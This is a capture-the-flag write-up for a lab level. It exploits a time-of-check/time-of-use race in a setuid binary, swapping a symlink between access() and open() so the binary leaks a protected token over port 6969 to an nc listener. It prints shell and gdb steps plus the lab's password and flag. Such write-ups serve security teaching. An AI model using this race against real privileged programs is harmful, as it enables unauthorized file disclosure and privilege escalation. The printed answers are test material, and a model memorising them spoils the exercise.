## Level 10

### First step

This binary is a program that send file that he reads on the network to port 6969 ( see error messages )

He uses the syscall access to check if he has rights to read the file ( gdb disassembling )

The security hole here is that between the time the access and open are done, file can be changed.

### Final step
We have two way to exploit this bug :
 - launching the programm in a loop on a symlink placed in tmp [ ugly ] and an other loop that change the symlink from a regular file to the token one  

```bash
$> sh /tmp/create.sh 1&- &
$> sh /tmp/connect.sh 1&- &
$> nc -kl 6969
...
.*( )*.
woupa2yuojeeaaed06riuj63c
.*( )*.
...
$> su flag10
Password: woupa2yuojeeaaed06riuj63c
Don't forget to launch getflag !
$> getflag
Check flag.Here is your token : feulo4b72j7edeahuete3no7c
```

 - gdb. We breakpoint somewhere between access and open, and when the program breaks, we swap the symlink, then continue

```bash
$> nc -l 6969
woupa2yuojeeaaed06riuj63c
$> su flag10
```
